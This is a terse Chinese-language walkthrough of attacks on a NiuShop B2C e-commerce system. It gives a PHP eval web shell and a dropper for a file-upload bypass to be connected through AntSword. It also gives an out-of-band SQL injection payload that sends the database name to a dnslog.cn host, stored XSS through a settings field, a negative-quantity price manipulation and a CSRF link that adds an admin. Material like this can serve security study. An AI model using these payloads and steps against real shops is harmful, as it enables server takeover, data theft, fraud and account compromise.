文件上传漏洞
先注册一个账号
来到个人信息修改个人头像
选择我们的马
#一句话(不想麻烦的选择一句话也可以)
<?php @eval($_POST["cmd"]);?>
#生成h.php文件
<?php
fputs(fopen('h.php','w'),'<?php @eval($_POST["cmd"]);?>');
?>
在BP中进行抓包,改为1.php
右键图片在网页新建打开图片标签;就能获取路径
去蚁剑连接生成的h.php就行
SQL注入漏洞
我们查看后台寻找功能点发现有一个地方可以执行 sql 命令
我们输入一个 sql 语句
发现没有回显,这时我们可以考虑使用外带注入
(select load_file(concat('\\\\',(select (database())),'96toab.dnslog.cn.dnslog.cn\\abc')))
得到数据库的名字为 niushop_b2c
获取表名
XSS漏洞
后台-->设置-->基础设置-->商城第三方统计代码
来到首页就会弹窗
0元购
在商品页面抓包
通过改变数量改变价格
在放行一次修改数量为-1
后面全部放行就OK了
CSRF漏洞
下载源码;制作添加管理员链接
添加管理员用户
BP抓包;制作SCRF
复制下来制作链接
admin管理员在已登录的状态点击我们的链接